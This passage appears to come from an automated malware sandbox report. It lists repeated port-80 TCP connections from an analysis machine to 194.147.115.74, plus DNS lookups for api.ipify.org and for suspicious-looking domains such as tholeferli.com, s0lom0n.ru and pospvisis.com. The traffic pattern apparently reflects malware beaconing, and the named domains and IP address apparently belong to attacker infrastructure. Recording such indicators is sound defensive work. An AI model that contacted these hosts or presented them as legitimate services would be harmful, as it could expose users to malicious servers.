                                                Jul 22, 2021 16:12:33.747662067 CEST8049345194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:33.747787952 CEST4934580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:33.974802017 CEST4934580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:33.977535009 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.028737068 CEST8049345194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.028819084 CEST4934580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.031985998 CEST8049346194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.032373905 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.034382105 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.089102030 CEST8049346194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.205979109 CEST8049346194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.209211111 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.443914890 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.445437908 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.496598005 CEST8049346194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.497389078 CEST4934680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.497586966 CEST8049347194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.497665882 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.498697042 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.551418066 CEST8049347194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.654334068 CEST8049347194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.654449940 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.879385948 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.881206989 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.931766033 CEST8049347194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.931899071 CEST4934780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.933440924 CEST8049348194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:34.934237957 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.935930967 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:34.988163948 CEST8049348194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.091860056 CEST8049348194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.092223883 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.362514019 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.363219976 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.414818048 CEST8049348194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.415029049 CEST4934880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.415539026 CEST8049349194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.415739059 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.416528940 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.468440056 CEST8049349194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.574692965 CEST8049349194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.574917078 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.804704905 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.806199074 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.858154058 CEST8049349194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.858238935 CEST4934980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.859760046 CEST8049350194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:35.859843969 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.860683918 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:35.912725925 CEST8049350194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.016088963 CEST8049350194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.016290903 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.236834049 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.238334894 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.289072990 CEST8049350194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.289149046 CEST4935080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.290361881 CEST8049351194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.290461063 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.291343927 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.344525099 CEST8049351194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.460500956 CEST8049351194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.460578918 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.672662020 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.673681021 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.724837065 CEST8049351194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.724971056 CEST4935180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.725895882 CEST8049352194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.726018906 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.727144957 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:36.781388044 CEST8049352194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.894742012 CEST8049352194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:36.894848108 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.285732985 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.286758900 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.338144064 CEST8049352194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:37.338274956 CEST4935280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.339209080 CEST8049353194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:37.339376926 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.342535019 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:37.395309925 CEST8049353194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:37.501259089 CEST8049353194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:37.502389908 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.058120966 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.059247017 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.110861063 CEST8049353194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.110939980 CEST4935380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.111983061 CEST8049354194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.112090111 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.112885952 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.165004969 CEST8049354194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.268619061 CEST8049354194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.268867016 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.514978886 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.516073942 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.568197966 CEST8049354194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.568280935 CEST4935480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.568754911 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.568916082 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.569412947 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.622412920 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.741261005 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.741333961 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.982099056 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.983536959 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.034728050 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:39.034831047 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.035532951 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:39.036401987 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.036431074 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.090308905 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.207247019 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.207441092 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.444874048 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.445635080 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.499068975 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.499311924 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.499774933 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.499865055 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.500648022 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.552774906 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.669029951 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.669164896 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.888046026 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.889691114 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.940288067 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.940469980 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.941852093 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.942074060 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.945125103 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.997324944 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.113933086 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.114428997 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.347208023 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.348275900 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.400002003 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.400090933 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.400600910 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.400686979 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.403152943 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.456309080 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.561014891 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.561269999 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.781958103 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.784185886 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.834460974 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.834645033 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.836342096 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.838529110 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.838561058 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.891588926 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.995012045 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.995270014 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.212312937 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.213701963 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.264738083 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.265153885 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.265913010 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.266227961 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.266980886 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.319293022 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.422451019 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.422637939 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.652498007 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.653662920 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.706551075 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.706748962 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.707051992 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.707259893 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.708059072 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.760246038 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.866810083 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.867047071 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.087609053 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.088988066 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.139982939 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.140100002 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.141057014 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.141207933 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.142509937 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.194612026 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.311347008 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.312232018 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.537765026 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.538798094 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.590450048 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.590605021 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.591573000 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.591691971 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.592484951 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.644747972 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.759109974 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.759407043 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.976574898 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.977813959 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.029335976 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.029515028 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.029937029 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.030117989 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.030925989 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.082988977 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.500493050 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.500722885 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.727790117 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.729096889 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.780184031 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.780308962 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.781372070 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.781470060 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.782286882 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.836709023 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.254894972 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.255105972 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.537681103 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.539206982 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.590153933 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.591068029 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.594995022 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.595072985 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.595802069 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.647969961 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.752193928 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.752473116 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.973026037 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.974572897 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.025496960 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.025619030 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.028120041 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.028249025 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.029088974 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.081290960 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.481442928 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.481722116 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.705471992 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.706924915 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.759773016 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.759804010 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.759850979 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.759921074 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.760914087 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.812992096 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.929050922 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.929282904 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.140719891 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.141725063 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.193407059 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.193540096 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.193780899 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.193871021 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.194482088 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.246736050 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.664597988 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.665174961 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.904573917 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.904663086 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.957787037 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.958041906 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.959105015 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.959284067 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.959391117 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.012670994 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.116082907 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.116338968 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.341614008 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.342657089 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.395771980 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.395852089 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.396903038 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.396991968 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.397820950 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.449985981 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:49.555432081 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:49.555520058 CEST4937280192.168.2.22194.147.115.74

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 22, 2021 16:11:03.349525928 CEST5219753192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:03.400099039 CEST53521978.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:03.917808056 CEST5309953192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:03.976232052 CEST53530998.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:04.258375883 CEST5283853192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:04.316255093 CEST53528388.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:04.316937923 CEST5283853192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:04.374874115 CEST53528388.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:05.833621025 CEST6120053192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:05.885163069 CEST53612008.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:06.360281944 CEST4954853192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:06.417241096 CEST53495488.8.8.8192.168.2.22
                                                Jul 22, 2021 16:11:07.855999947 CEST5562753192.168.2.228.8.8.8
                                                Jul 22, 2021 16:11:07.916183949 CEST53556278.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jul 22, 2021 16:11:03.349525928 CEST192.168.2.228.8.8.80x8e4aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.917808056 CEST192.168.2.228.8.8.80x7adaStandard query (0)tholeferli.comA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:04.258375883 CEST192.168.2.228.8.8.80xd517Standard query (0)s0lom0n.ruA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:04.316937923 CEST192.168.2.228.8.8.80xd517Standard query (0)s0lom0n.ruA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.833621025 CEST192.168.2.228.8.8.80x260dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:06.360281944 CEST192.168.2.228.8.8.80x98dfStandard query (0)pospvisis.comA (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:07.855999947 CEST192.168.2.228.8.8.80x84b4Standard query (0)pospvisis.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.88.121A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.224.49A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.168.151A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.246.238A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST8.8.8.8192.168.2.220x8e4aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.216.118A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:03.976232052 CEST8.8.8.8192.168.2.220x7adaNo error (0)tholeferli.com194.147.115.74A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:04.316255093 CEST8.8.8.8192.168.2.220xd517No error (0)s0lom0n.ru8.211.241.0A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:04.374874115 CEST8.8.8.8192.168.2.220xd517No error (0)s0lom0n.ru8.211.241.0A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.239.65A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.238.218A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
